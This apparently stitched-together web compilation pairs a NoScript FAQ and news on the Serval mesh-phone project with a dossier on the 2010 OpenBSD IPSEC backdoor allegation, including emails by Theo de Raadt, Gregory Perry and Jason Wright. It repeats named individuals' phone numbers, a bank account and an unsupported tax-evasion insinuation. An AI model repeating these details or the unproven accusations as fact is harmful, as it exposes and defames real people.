[17] P. Johnson-Laird, V. Girotto, , and P. Legrenzi. Mental models: a gentle guide for outsiders. Available at http://www.si.umich.edu/ICOS/gentleintro.html, 1998.
[18] P. N. Johnson-Laird. Mental models in cognitive science. Cognitive Science: A Multidisciplinary Journal, 4(1):71–115, 1980.
[19] W. Kempton. Two theories of home heat control. Cognitive Science: A Multidisciplinary Journal, 10(1):75–90, 1986.
[20] A. J. Kuzel. Sampling in qualitative inquiry. In B. Crabtree and W. L. Miller, editors, Doing Qualitative Research, chapter 2, pages 31–44. Sage Publications, Inc., 1992.
[21] J. Markoff. Attack of the zombie computers is a growing threat, experts say. New York Times, January 7 2007.
[22] D. Medin, N. Ross, S. Atran, D. Cox, J. Coley, J. Proffitt, and S. Blok. Folkbiology of freshwater fish. Cognition, 99(3):237–273, April 2006.
[23] M. B. Miles and M. Huberman. Qualitative Data Analysis: An Expanded Sourcebook. Sage Publications, Inc., 2nd edition edition, 1994. MilesHuberman1994.
[24] A. J. Onwuegbuzie and N. L. Leech. Validity and qualitative research: An oxymoron? Quality and Quantity, 41:233–249, 2007.
[25] D. Russell, S. Card, P. Pirolli, and M. Stefik. The cost structure of sensemaking. In Proceedings of the INTERACT ’93 and CHI ’93 conference on Human factors in computing system, 1993.
[26] Trend Micro. Taxonomy of botnet threats. Whitepaper, November 2006.

APPENDIX
This appendix contains samples of data matrix displays that were developed during the data analysis phase of this project.

CONTACT
Rick Wash
http://www.rickwash.com
email : wash [at] msu [edu] edu

SEE ALSO: SCRIPTS
http://noscript.net/faq

Q: Why can I sometimes see about:blank and/or wyciwyg: entries? What scripts are causing this?
A:   about:blank is the common URL designating empty (newly created) web documents. A script can “live” there only if it has been injected (with document.write() or DOM manipulation, for instance) by another script which must have its own permissions to run. It usually happens when a master page creates (or statically contains) an empty sub-frame (automatically addressed as about:blank) and then populates it using scripting. Hence, if the master page is not allowed, no script can be placed inside the about:blank empty page and its “allowed” privileges will be void. Given the above, risks in keeping about:blank allowed should be very low, if any. Moreover, some Firefox extensions need it to be allowed for scripting in order to work. Sometimes, especially on partially allowed sites, you may see also a wyciwyg: entry. It stands for “What You Cache Is What You Get”, and identifies pages whose content is generated by JavaScript code through functions likedocument.write(). If you can see such an entry, you already allowed the script generating it, hence the aboveabout:blank trust discussion applies to this situation as well.

Q: Why should I allow JavaScript, Java, Flash and plugin execution only for trusted sites?
A:   JavaScriptJava and Flash, even being very different technologies, do have one thing in common: they execute on your computer code coming from a remote site. All the three implement some kind of sandbox model, limiting the activities remote code can perform: e.g., sandboxed code shouldn’t read/write your local hard disk nor interact with the underlying operating system or external applications. Even if the sandboxes were bullet proof (not the case, read below) and even if you or your operating system wrap the whole browser with another sandbox (e.g. IE7+ on Vista or Sandboxie), the mere ability of running sandboxed code inside the browser can be exploited for malicious purposes, e.g. to steal important information you store or enter on the web (credit card numbers, email credentials and so on) or to “impersonate” you, e.g. in fake financial transactions, launching “cloud” attacks like Cross Site Scripting (XSS) or CSRF, with no need for escaping your browser or gaining privileges higher than a normal web page. This alone is enough reason to allow scripting on trusted sites only. Moreover, many security exploits are aimed to achieve a “privilege escalation”, i.e. exploiting an implementation error of the sandbox to acquire greater privileges and perform nasty task like installing trojans, rootkits and keyloggers.

This kind of attack can target JavaScript, Java, Flash and other plugins as well:

  1. JavaScript looks like a very precious tool for bad guys: most of the fixed browser-exploitable vulnerabilities discovered to date were ineffective if JavaScript was disabled. Maybe the reason is that scripts are easier to test and search for holes, even if you’re a newbie hacker: everybody and his brother believe to be a JavaScript programmer :P
  2. Java has a better history, at least in its “standard” incarnation, the Sun JVM. There have been viruses, instead, written for the Microsoft JVM, like the ByteVerifier.Trojan. Anyway, the Java security model allows signed applets (applets whose integrity and origin are guaranteed by a digital certificate) to run with local privileges, i.e. just like they were regular installed applications. This, combined with the fact there are always users who, in front of a warning like “This applet is signed with a bad/fake certificate. You DON’T want to execute it! Are you so mad to execute it, instead? [Never!] [Nope] [No] [Maybe]”, will search, find and hit the “Yes” button, caused some bad reputation even to Firefox (notice that the article is quite lame, but as you can imagine had much echo).
  3. Flash used to be considered relatively safe, but since its usage became so widespread severe security flaws have been found at higher rate. Flash applets have also been exploited to launch XSS attacksagainst the sites where they’re hosted.
  4. Other plugins are harder to exploit, because most of them don’t host a virtual machine like Java and Flash do, but they can still expose holes like buffer overruns that may execute arbitrary code when fed with a specially crafted content. Recently we have seen several of these plugin vulnerabilities, affecting Acrobat Reader, Quicktime, RealPlayer and other multimedia helpers.

Please notice that none of the aforementioned technologies is usually (95% of the time) affected by publicly known and still unpatched exploitable problems, but the point of NoScript is just this: preventing exploitation of even unknown yet security holes, because when they are discovered it may be too late ;) The most effective way is disabling the potential threat on untrusted sites.

Q:  What is a trusted site?
A:  A “trusted site” is a site whose owner is well identifiable and reachable, so I have someone to sue if he hosts malicious code which damages or steals my data.* If a site qualifies as “trusted”, there’s no reason why I shouldn’t allow JavaScript, Java or Flash. If some content is annoying, I can disable it with AdBlock. What I’d like to stress here is that “trust” is not necessarily a technical matter. Many online banking sites require JavaScript and/or Java, even in contexts where these technologies are absolutely useless and abused: for more than 2 years I’ve been asking my bank to correct a very stupid JavaScript bug preventing login from working with Firefox. I worked around this bug writing an ad hoc bookmarklet, but I’m not sure the average Joe user could.

So, should I trust their mediocre programmers for my security? Anyway, if something nasty happens with my online bank account because it’s unsafe, I’ll sue them to death (or better, I’ll let the world know) until they refund me. So you may say “trust” equals “accountability”. If you’re more on the technical side and you want to examine the JavaScript source code before allowing, you can help yourself with JSView.

* You may ask, what if site I really trust gets compromised? Will I get infected as well because I’ve got it in my whitelist, ending to sue as you said? No, you won’t, most probably. When a respectable site gets compromised, 99.9% of the times malicious scripts are still hosted on a different domain which is likely not in your whitelist, and gets just included by the pages you trust. Since NoScript blocks 3rd party scripts which have not been explicitly whitelisted themselves, you’re still safe, with the additional benefit of an early warning :)

http://www.servalproject.org/
http://gigaom.com/mobile/egypt-as-example-a-case-for-mesh-networks-on-phones/
How Phone-Powered Mesh Networks Could Help in Egypt
by Kevin C. Tofel / Feb. 1, 2011

Mobile broadband is arguably the most empowering technology that’s currently driving the cloud, smartphone and app markets, but it’s simply not feasible to cover every square inch of the planet with a fast wireless connection. So how does one communicate with others in an area without any cellular coverage, or when governments request a shut down of network services? The answer may lie within phones that create a direct relay system to transmit voice or data. This approach is called a mesh network, which enables a device to both receive and retransmit signals, much like a router does in home wireless network. The below video from ABC News Adelaide shows the mesh network in action on basic Android handsets, with researchers communicating to each other by voice, even though there are no cellular towers in range.

You can easily tell in the video spot that the voice quality is sub-par and therefore, best suited for emergency communication in remote areas outside of traditional network coverage. But the peer-to-peer voice technology could improve as radios and software continue to evolve. The scenario reminds me of one of my first Skype calls back in 2004 — ironically, to someone in Australia — the call was filled with delays and echos, but still usable. Just use Skype now to see how the technology has been refined and improved. While carriers control much of the handset experience and have little to no incentive to trying to mature a communications technology that bypasses their networks, I’d like to see such mesh network research efforts continue. Think of the current situation in Egypt, where protests, tweets and phone calls have put the region front and center on the world stage and have caused the Egyptian government to effectively shut down Internet access in the country.

That’s just one step short of closing down cellular voice communications. In an extreme case such as that, phones that can enable direct communication through a handset relay system would enable families, emergency crews and others to avoid a total communications black-out. Data too could be routed through such mesh networks, ensuring that tweets and web services continue to flow. And while many voice and data networks are still separate today, the rise of 4G networks will eventually bring voice traffic over the web too, so any future Internet shut-downs could impact voice calls. Will mesh or peer-to-peer technologies completely replace traditional networks for voice, or data, for that matter? That’s highly unlikely due to many corporate, legal and technological challenges. But should such relay services and software solutions continue to be looked at as backup plans? I’d say yes, and I’m willing to bet a fair number of people in Egypt right now would agree.


Project Serval aims to enable communication anywhere, any time, without infrastructure, cell towers, or mobile carriers.

http://soundcloud.com/salimfadhley/pd_mesh1
http://www.informationweek.com/news/telecom/voip/showArticle.jhtml?articleID=229200136
Android Software Connects Calls Without Mobile Carriers
by Thomas Claburn / February 1, 2011

A university researcher in Australia has developed software that allows Android phones to make voice calls without the help of a mobile carrier. Paul Gardner-Stephen, a research fellow in the School of Computer Science, Engineering and Mathematics at Flinders University in Adelaide, Australia, has devised a technology that relays calls directly from one phone to another. The software will soon be available on the Serval Project Web site. It has two components: one creates a temporary, self-organizing, self-powered mobile network using phone towers dropped by air (as might be done in a crisis situation); the second supports a permanent mesh network that allows Wi-Fi enabled mobile phones, and eventually phones that connect via unlicensed frequencies (called Batphones), to communicate directly. “Phones running our software relay calls between themselves,” said Gardner-Stephen in a university news release. “If even just one of those can see a cell tower, then calls can be with any of the phones, thus sustaining communications in affected areas. A balloon is not necessary; a phone running our software at any vantage point can suffice.”

Gardner-Stephen cites the recent flooding in parts of Australia, which disabled cell towers, as a use case for the technology. The ongoing communications blackout in Egypt represents another such scenario. Mesh networks are not a new concept, as can be seen from the Mesh Potato. Such projects seem to share a goal of providing phone service to under-served or poor communities. Gardner-Stephen says that any telephone carrier or handset maker can incorporate the Project Serval software and that the Project Serval team will be happy to help make that happen. The promise of the Serval Project may sound tempting to those who’d rather not pay hefty smartphone bills every month — “use your existing mobile phone number wherever you go, and never pay roaming charges again” — but it remains to be seen how keen mobile carriers will be to get paid less for phone calls or nothing at all. Add to that the difficulty of monitoring phone-to-phone communication, particularly if encryption is added, and it’s likely that control-oriented governments will look for ways to limit this kind of technology in the name of combating terrorism.

[blip.tv http://blip.tv/play/AYKf6TEC%5D

http://www.computerworlduk.com/news/mobile-wireless/3258619/charities-and-ngos-express-interest-in-mobile-mesh-networking/
Charities and NGOs express interest in mobile mesh networking
Mobile communication without traditional infrastructure
by James Hutchinson / 29 January 11

A research project aimed at allowing mobile phones to communicate without traditional infrastructure has attracted phone manufactures and not-for-profits looking to leverage the technology. Paul Gardner-Stephen, who co-founded the Serval project, first demonstrated the mesh network technology while experimenting with the use of Wi-Fi transmitters on phones to carry VoIP conversations. The makeshift capability is capable of transmitting a few hundred metres, but could conceivably harness other phones and inexpensive Wi-Fi transmitters in the area to provide more coverage, even if hundreds of kilometres away from a mobile phone tower. “We are actually carrying voice over that but in a way that doesn’t need to go back to a central repository anywhere,” Flinders University researcher, Paul Gardner-Stephen, told ABC Local Radio program, AM, at the time.

Natural disasters
Initial expectations were that the experimental mobile technology would be used in cases of a natural disaster, allowing rescue workers to communicate with each other and to head office, either by utilising each others’ mobile phones as transmitters themselves or by deploying portable Wi-Fi transmitters by plane. Presenting at linux.conf.au 2011 this week, Gardner-Stephen said community response had already surpassed expectations, with the Australian Red Cross voicing enthusiasm at the possibilities. “They said during the Victorian bushfires, and I was flabbergasted when I heard this, they lost contact with crews for three days in the midst of the bushfires,” he said. “That’s one of the things that this technology can work to.” Gardner-Stephen said one phone manufacturer had also registered interest, though continuing talks with carriers around improving existing mobile infrastructure in rural areas were non-productive. The Serval project has garnered $1000 in funding from The Awesome Foundation while Gardner-Stephen gained a three year fellowship with Flinders University, allowing him to work on the project full-time. The research project, which now counts seven people among its members, has continued to work on improving the technology, with plans to move away from data-heavy SIP voice protocols to an open source standard developed in-house.

The software is soon expected to work across all Android devices as well as iOS, Windows Mobile and other platforms, though the project is also looking to develop ‘Batphones’ that work over unlicensed frequencies rather than Wi-Fi. Gardner-Stephen used his presentation at linux.conf.au to provide the first public demonstration of the newly implemented PSTN gateway, allowing outbound calls from enabled devices to standard landline and mobile phones. Demonstrated on a “rooted” HTC Dream, or Google G1, the device called a mobile phone on a standard 3G network over Wi-Fi, while in airplane mode. A similar demonstration between two enabled devices operating over the mesh network wasn’t as successful. Later during the day, Gardner-Stephen performed another demonstration at the conference, launching a hot air balloon with Wi-Fi transmitter attached to provide greater coverage between mesh devices.

No threat to telcos
Serval’s attempt at creating a “best effort network” in areas without mobile coverage was not a threat to the existing telecommunications landscape, Gardner-Stephen said. “In actual fact, telcos are the ideal people to provide the interconnect between the local meshes,” he said. “Certainly for the first telco to partner with us, there’s actually some enormous dividends to be had. “We’re excited that this technology is not going to cost anyone a cent, there’s no reason why it can’t be put in every phone that’s physically capable of supporting it and that it can save lives, that it can save stress and duress in disasters. That it can connect the last two billion, and actually the last five billion, to the internet, because it’s all over IP.” Though Gardner-Stephen couldn’t confirm plans on IPv6 compatibility for the software, he said each of the phones connected to the mesh network would effectively share a single IPv4 address with a unique subscriber identifier used to differentiate between devices. David Rowe, another presenter at the linux.conf.au 2011 conference, talked about the the successes of a similar mesh-like telephone technology Village Telco in the East Timorese capital of Dili.

The FBI has been accused of planting backdoor in OpenBSD IPSEC stack, ten years ago.

The code is a publicly available Open Source project, the full history of commits is available for public review.  After a week of worldwide code audits by various institutions, no evidence to this effect has yet to be produced.

Whose logo do you trust more?  (OpenBSD on the left, FBI on the right)

http://en.wikipedia.org/wiki/IPsec
Internet Protocol Security (IPsec) is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a communication session.

WHO CARES?

The implication in this situation is that the FBI could have then maintained a capability to eavesdrop on a majority of the world’s most secret digital communications.  The OpenBSD IPSEC stack sits at the lowest levels of most Open Source and Proprietary network software and hardware, Free and Commercial alike.  IPSEC, being born of the IPv6 protocol suite, is completely requisite in any standards-compliant IPv6 implementation- yet optional for IPv4, (the protocol of the current internet).

The OpenBSD IPSEC stack is possibly the most widely used and most trusted pieces of cryptographic network software.

Anyone who wants to may download the source code, (including all historical commits), and contemplate this reality for yourself:
http://www.openbsd.org/cgi-bin/cvsweb/
http://www.openbsd.org/anoncvs.html

Not sure you trust the official sources?  Find a mirror which suits you:
http://www.openbsd.org/ftp.html

http://www.tcpipguide.com/free/t_IPSecModesTransportandTunnel-2.htm

Where is this code?  It is widely assumed parts or all of the OpenBSD IPSEC stack can be found in:

http://en.wikipedia.org/wiki/IPsec#Software_implementations

– OpenBSD, with its own code derived from a BSD/OS implementation written by John Ioannidis and Angelos D. Keromytis in 1996.
– The KAME stack, that is included in Mac OS X, NetBSD and FreeBSD.
– “IPsec” in Cisco IOS Software
– “IPsec” in Microsoft Windows, including Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Vista and later
– Authentec QuickSec toolkits
– IPsec in Solaris
– IBM AIX operating system
– IBM z/OS
– IPsec and IKE in HP-UX (HP-UX IPsec)
– The Linux IPsec stack written by Alexey Kuznetsov and David S. Miller.
– Openswan on Linux, FreeBSD and Mac OS X using the native Linux IPsec stack, or its own KLIPS stack.
– strongSwan on Linux, FreeBSD, Mac OS X, and Android using the native IPsec stack.


10 YEARS AGO IN CRYPTO HISTORY, SOME CONTEXT
(cryptographers and people with secrets were quite grumpy)

The cryptography and info-sec communities were reeling after several high-profile US faux-paus:

1994, CALEA, Communications Assistance for Law Enforcement Act
“To amend title 18, United States Code, to make clear a telecommunications carrier’s duty to cooperate in the interception of communications for Law Enforcement purposes, and for other purposes.”
http://en.wikipedia.org/wiki/Communications_Assistance_for_Law_Enforcement_Act

1993 to 1996: The Clipper Chip initiative, a move to put hardware-chip backdoors in every electronic device, a Presidential directive from US President President Bill Clinton:
http://en.wikipedia.org/wiki/Clipper_chip

US Cryptography Export Issues:
Long story short, in cryptography, it’s best to have as many eyes in the world auditing cryptographic code and algorithms.  US Crypto Export restrictions became especially contentious/silly in the late 1990’s:
http://en.wikipedia.org/wiki/Export_of_cryptography_in_the_United_States

Tempest operations, Eaves-Dropping via electrical emissions, (particularly a hot topic in the 1990’s, as declassified NSA work in the late 80’s was focused on using computer monitors emissions to eavesdrop on communications):
http://en.wikipedia.org/wiki/TEMPEST

Echelon, Cold-War onward, European Parliment moved to publicly investigate during 2001:
http://en.wikipedia.org/wiki/ECHELON

circa 1997-2005, Carnivore, Software system implemented by the FBI to monitor email and electronic communications:
http://en.wikipedia.org/wiki/Carnivore_(software)


<http://en.wikipedia.org/wiki/Openbsd>
Backdoor allegations

On 11 December 2010, Gregory Perry sent an email to Theo de Raadt alleging that FBI had paid some OpenBSD ex-developers 10 years previously to insert backdoors into the OpenBSD Cryptographic Framework. Theo de Raadt made the email public on 14 December by forwarding it to the openbsd-tech mailing list and suggested an audit of the IPsec codebase.[55][56] Theo’s response was skeptical of the report and he invited all developers to independently review the relevant code. In the week that has followed, no patches to that area of the code have appeared. As time and code reviews go on without backdoors found, this seems more and more likely to be a hoax on Perry’s part.


THEO’S ORIGINAL POST
(OpenBSD Project Leader)
http://marc.info/?l=openbsd-tech&m=129236621626462&w=2

List:       openbsd-tech
Subject:    Allegations regarding OpenBSD IPSEC
From:       Theo de Raadt <deraadt () cvs ! openbsd ! org>
Date:       2010-12-14 22:24:39
Message-ID: 201012142224.oBEMOdWM031222 () cvs ! openbsd ! org

I have received a mail regarding the early development of the OpenBSD
IPSEC stack.  It is alleged that some ex-developers (and the company
they worked for) accepted US government money to put backdoors into
our network stack, in particular the IPSEC stack.  Around 2000-2001.

Since we had the first IPSEC stack available for free, large parts of
the code are now found in many other projects/products.  Over 10
years, the IPSEC code has gone through many changes and fixes, so it
is unclear what the true impact of these allegations are.

The mail came in privately from a person I have not talked to for
nearly 10 years.  I refuse to become part of such a conspiracy, and
will not be talking to Gregory Perry about this.  Therefore I am
making it public so that
(a) those who use the code can audit it for these problems,
(b) those that are angry at the story can take other actions,
(c) if it is not true, those who are being accused can defend themselves.

Of course I don’t like it when my private mail is forwarded.  However
the “little ethic” of a private mail being forwarded is much smaller
than the “big ethic” of government paying companies to pay open source
developers (a member of a community-of-friends) to insert
privacy-invading holes in software.

—-

From: Gregory Perry <Gregory.Perry@GoVirtual.tv>
To: “deraadt@openbsd.org” <deraadt@openbsd.org>
Subject: OpenBSD Crypto Framework
Thread-Topic: OpenBSD Crypto Framework
Thread-Index: AcuZjuF6cT4gcSmqQv+Fo3/+2m80eg==
Date: Sat, 11 Dec 2010 23:55:25 +0000
Message-ID: <8D3222F9EB68474DA381831A120B1023019AC034@mbx021-e2-nj-5.exch021.domain.local>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Content-Type: text/plain; charset=”iso-8859-1″
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
Status: RO

Hello Theo,

Long time no talk.  If you will recall, a while back I was the CTO at
NETSEC and arranged funding and donations for the OpenBSD Crypto
Framework.  At that same time I also did some consulting for the FBI,
for their GSA Technical Support Center, which was a cryptologic
reverse engineering project aimed at backdooring and implementing key
escrow mechanisms for smart card and other hardware-based computing
technologies.

My NDA with the FBI has recently expired, and I wanted to make you
aware of the fact that the FBI implemented a number of backdoors and
side channel key leaking mechanisms into the OCF, for the express
purpose of monitoring the site to site VPN encryption system
implemented by EOUSA, the parent organization to the FBI.  Jason
Wright and several other developers were responsible for those
backdoors, and you would be well advised to review any and all code
commits by Wright as well as the other developers he worked with
originating from NETSEC.

This is also probably the reason why you lost your DARPA funding, they
more than likely caught wind of the fact that those backdoors were
present and didn’t want to create any derivative products based upon
the same.

This is also why several inside FBI folks have been recently
advocating the use of OpenBSD for VPN and firewalling implementations
in virtualized environments, for example Scott Lowe is a well
respected author in virtualization circles who also happens top be on
the FBI payroll, and who has also recently published several tutorials
for the use of OpenBSD VMs in enterprise VMware vSphere deployments.

Merry Christmas…

Gregory Perry
Chief Executive Officer
GoVirtual Education

“VMware Training Products & Services”

540-645-6955 x111 (local)
866-354-7369 x111 (toll free)
540-931-9099 (mobile)
877-648-0555 (fax)

http://www.facebook.com/GregoryVPerry
http://www.facebook.com/GoVirtual


INITIAL RESPONSE FROM ONE PARTY IMPLICATED
Jason Wright
http://marc.info/?l=openbsd-tech&m=129244045916861&w=2

List:       openbsd-tech
Subject:    Re: Allegations regarding OpenBSD IPSEC
From:       “Jason L. Wright” <jason () thought ! net>
Date:       2010-12-15 18:27:31
Message-ID: 20101215182710.GA6897 () jason-wright ! cust ! arpnetworks ! com

Subject: Allegations regarding OpenBSD IPSEC

Every urban lengend is made more real by the inclusion of real names,
dates, and times. Gregory Perry’s email falls into this category.  I
cannot fathom his motivation for writing such falsehood (delusions
of grandeur or a self-promotion attempt perhaps?)

I will state clearly that I did not add backdoors to the OpenBSD
operating system or the OpenBSD crypto framework (OCF). The code I
touched during that work relates mostly to device drivers to support
the framework. I don’t believe I ever touched isakmpd or photurisd
(userland key management programs), and I rarely touched the ipsec
internals (cryptodev and cryptosoft, yes).  However, I welcome an
audit of everything I committed to OpenBSD’s tree.

I demand an apology from Greg Perry (cc’d) for this accusation.  Do
not use my name to add credibility to your cloak and dagger fairy
tales.

I will point out that Greg did not even work at NETSEC while the OCF
development was going on.  Before January of 2000 Greg had left NETSEC.
The timeline for my involvement with IPSec can be clearly demonstrated
by looking at the revision history of:
src/sys/dev/pci/hifn7751.c (Dec 15, 1999)
src/sys/crypto/cryptosoft.c (March 2000)
The real work on OCF did not begin in earnest until February 2000.

Theo, a bit of warning would have been nice (an hour even… especially
since you had the allegations on Dec 11, 2010 and did not post them
until Dec 14, 2010).  The first notice I got was an email from a
friend at 6pm (MST) on Dec 14, 2010 with a link to the already posted
message.

So, keep my name out of the rumor mill.  It is a baseless accusation
the reason for which I cannot understand.

–Jason L. Wright

SOURCE CODE REFERENCES
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/dev/pci/hifn7751.c
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/crypto/cryptosoft.c


Jason Wright, “Regarding Greg Perry’s baseless accusations”
http://thought.net/jason/

I have posted a message to tech@. I do not intend to add any more fuel to his baseless accusations. [posting]
http://marc.info/?l=openbsd-tech&m=129244045916861&w=2

Publications

“Neural Network Architecture Selection Analysis With Application to Cryptography Location”
Jason L. Wright and Milos Manic. In Proceedings International Joint Conference on Neural Networks (IJCNN), July 2010, Barcelona, Spain.doi:10.1109/IJCNN.2010.5596315
http://dx.doi.org/10.1109/IJCNN.2010.5596315

“The Analysis of Dimensionality Reduction Techniques in Cryptographic Object Code Classification”
Jason L. Wright and Milos Manic. In Proceedings Conference on Human Systems Interaction (HSI), pp. 157-162, May 2010, Rzeszow, Poland.doi:10.1109/HSI.2010.5514572
http://thought.net/jason/cv/hsi10_submission_44.pdf
http://ieeexplore.ieee.org/xpl/freeabs_all.jsp?arnumber=5514572

“Neural Network Approach to Locating Cryptography in Object Code”
Jason L. Wright and Milos Manic. In Proceedings International Conference on Emerging Technologies and Factory Automation (ETFA), September 2009, Palma de Mallorca, Spain. doi:10.1109/ETFA.2009.5347226
http://www.inl.gov/technicalpublications/Documents/4363837.pdf
http://dx.doi.org/10.1109/ETFA.2009.5347226

“Time Synchronization in Heirarchical TESLA Wireless Sensor Networks”
Jason L. Wright and Milos Manic. In Proceedings International Symposium on Resilient Control Systems (ISRCS), pp. 36-39, August 2009, Idaho Falls, ID, USA. doi:10.1109/ISRCS.2009.5251365
http://www.inl.gov/technicalpublications/Documents/4336149.pdf
http://dx.doi.org/10.1109/ISRCS.2009.5251365

“Finding Cryptography in Object Code”
Jason L. Wright. In Proceedings Security Education Conference: Toronoto (SECTOR). October 2008, Toronto, ON, Canada. (slides)
http://thought.net/jason/cv/CON-08-14597-paper.pdf
http://thought.net/jason/cv/CON-08-14597-slides.pdf

“Recommended Practice for Security Control System Modems”
James R. Davidson and Jason L. Wright. U.S. Department of Homeland Security National Cyber Security Division, Control Systems Security Program. January 2008.
http://csrp.inl.gov/Documents/SecuringModems.pdf

“Cryptography As An Operating System Service: A Case Study”
Angelos D. Keromytis, Theo de Raadt, Jason L. Wright, and Matthew Burnside. In ACM Transactions on Computer Systems (ToCS), vol. 24, no. 1, pp. 1 – 38, February 2006. (Extended version of USENIX Technical 2003 paper). doi:10.1145/1124153.1124154
http://thought.net/jason/cv/p1-keromytis.pdf
http://portal.acm.org/citation.cfm?doid=1124153.1124154

“The Design of the OpenBSD Cryptographic Framework”
Angelos D. Keromytis, Jason L. Wright, and Theo de Raadt. In Proceedings of the USENIX Annual Technical Conference, pp. 181 – 196. June 2003, San Antonio, TX. (Acceptance rate: 23.3%)
http://thought.net/jason/cv/ocf.pdf

“Experiences Enhancing Open Source Security in the POSSE Project”
Jonathan M. Smith, Michael B. Greenwald, Sotiris Ioannidis, Angelos D. Keromytis, Ben Laurie, Douglas Maughan, Dale Rahn, and Jason L. Wright. In Free/Open Source Development, Stefan Koch (editor), pp. 242 – 257. Idea Group Publishing, 2004. Also re-published in Global Information Technologies: Concepts, Methodologies, Tools, and Applications, Felix B. Tan (editor), pp. 1587- 1598. Idea Group Publishing, 2007.
http://thought.net/jason/cv/posse-chapter.pdf
http://thought.net/jason/cv/4-28.pdf

“Transparent Network Security Policy Enforcement”
Angelos Keromytis and Jason Wright. In Proceedings of the USENIX Annual Technical Conference, Freenix Track, pp. 215 – 226. June 2000, San Diego, CA. (Acceptance rate: 30%)
http://thought.net/jason/cv/bridgepaper.pdf

Presentations

“When Hardware is Wrong, or ‘They Can Fix it in Software'”
NYC BSD Conference, October 2008.
http://thought.net/jason/cv/hardware-wrong.pdf

“OpenBSD/sparc64”
NYC BSD Conference, October 2006.


CRYPTOME
http://cryptome.org/0003/fbi-backdoors.htm

21 December 2010. A sends:

Just to point out that one of the ex-developers involved in that period has posted some background info. You can contact Mickey yourself for more information:how i stopped worrying and loved the backdoor

http://mickey.lucifier.net/b4ckd00r.html

By the way, anybody want to elaborate how Theo de Raadt has been hiding 2 donations accounts from Canadian Tax Revenue Services for years now?

(Paypal and the German account  IBAN: DE91 7007 0024 0338 1779 00
BIC: DEUT DE DBMUC
Name: Theo de Raadt
Address: Deutsche Bank, Marienplatz 21
80331 München, Germany

Inside Germany, instead use:

Name: Theo de Raadt
Bank: Deutsche Bank München
BLZ: 70070024
Konto: 338177900

From outside Europe:

SWIFT: DEUTDEDBMUC
Account: 7007 0024 0338 1779 00
Name: Theo de Raadt
Address: Deutsche Bank, Marienplatz 21
80331 München, Germany

__________

20 December 2010. Gregory Perry further responds with the truth about the FBI:

From: Gregory Perry <Gregory.Perry[at]GoVirtual.tv>
To: John Young <jya[at]pipeline.com>
Subject: RE: OpenBSD Crypto Framework
Date: Mon, 20 Dec 2010 14:33:54 +0000

The issue of retribution has been ongoing on for over a decade at this point, the FBI is a lawless and corrupt organization with little hope for rehabilitation.  Maybe one day the Congress will issue a subpoena into their domestic ops and related skullduggery.

_________

From: John Young <jya[at]pipeline.com>
Sent: Monday, December 20, 2010 9:06 AM
To: Gregory Perry
Subject: RE: OpenBSD Crypto Framework

Thanks very much for responding. If you care to do so, we would like to hear of any retribution for dislosing the hole. Wikileaks we’re not but quieter. Anonymous is our best source.


20 December 2010. Gregory Perry responds:

From: Gregory Perry <Gregory.Perry[at]GoVirtual.tv>
To: John Young <jya[at]pipeline.com>
Subject: RE: OpenBSD Crypto Framework
Date: Mon, 20 Dec 2010 02:17:23 +0000

I really wish Theo hadn’t made that email public, it’s really stirred up things quite a bit in the mainstream media.

To put things into perspective, the salient points to consider are:

1)  I sent a private letter to Theo Deraadt, urging him to perform a source code audit of the OpenBSD Project based upon the allegations contained within the original email you referenced;

2)  Theo then sent, without my permission and against my wishes, the entire contents of that email with my contact particulars to a public listserver, which ignited this firestorm of controversy that I am now seemingly embroiled in;

3)  If I had this to do over again, I would have sent an anonymous postcard to Wikileaks probably;

4)  I have absolutely, positively nothing to gain from making those statements to Theo, and only did so to encourage a source code audit of the OpenBSD Project based upon the expiry of my NDA with the FBI; and,

5)  Being in any limelight is not my bag at all.

I personally hired and managed Jason Wright as well as several other developers that were involved with the OpenBSD Project, I am intimately familiar with OpenBSD having used it for a variety of commercial products over the years, and I arranged the initial funding for the cryptographic hardware accelerated OCF and gigabit Ethernet drivers by way of a series of disbursements of equipment and development monies made available via NETSEC (as well as my own personal donations) to the OpenBSD Project.

Although I don’t agree with what Theo did last week, I will say that he is a brilliant and very respected individual in the computer security community and he would have in no way agreed to intentionally weaken the security of his project.  Theo is an iron-fisted fascist when it comes to secure systems architecture, design, and development, and there is no better person than him and his team to get to the bottom of any purported issues with the OpenBSD security controls and its various internal cryptographic frameworks.

Many, many commercial security products and real time embedded systems are derived from the OpenBSD Project, due to Theo’s liberal BSD licensing approach contrasted with other Linux-based operating systems licensed under the GPL.  Many, many commercial security products and embedded systems are directly and proximately affected by any lapse in security unintentional or otherwise by the OpenBSD Project.  Almost every operating system on the planet uses the OpenSSH server suite, which Theo and his team created with almost zero remuneration from the many operating systems and commercial products that use it without credit to the OpenBSD Project.  Given the many thousands of lines of code that the IPSEC stack, OCF, and OpenSSL libraries consist of, it will be several months before the dust settles and the true impact of any vulnerabilities can be accurately determined; it’s only been about 96 hours since their source code audit commenced and your recent article points to at least two vulnerabilities discovered so far.

I wish Theo and his team the best of success with their project and endeavors.

Kind regards

Gregory Perry
Chief Executive Officer
GoVirtual® Education
http://www.GoVirtual.tv
P: 540-645-6955 x111
F: 877-648-0555
C: 540-931-9099
E: Gregory.Perry[at]GoVirtual.tv

GoVirtual® Education
10400 Courthouse Rd. #280
Spotsylvania, Virginia 22553

“VMware Training Products and Services”

Subscribe to the GoVirtual® Newsletter


15 December 2010. A3 sends a link to a refutation of Perry’s claims by Jason Wright, one accused by Perry:

http://marc.info/?l=openbsd-tech&m=129244045916861&w=2

15 December 2010. A sends a link to a report on Perry’s affirmation of his claims and new ones’s well:

http://blogs.csoonline.com/1296/an_fbi_backdoor_in_openbsd

15 December 2010. A1 and A2 send an account of denials by named participants and a fruitless effort to contact Perry:

http://www.itworld.com/open-source/130820/openbsdfbi-allegations-denied-named-participant

A pointer to any response from Perry would be appreciated. Send to: cryptome[at]earthlink.net.

15 December 2010. A sent the same URL. Cryptome response:

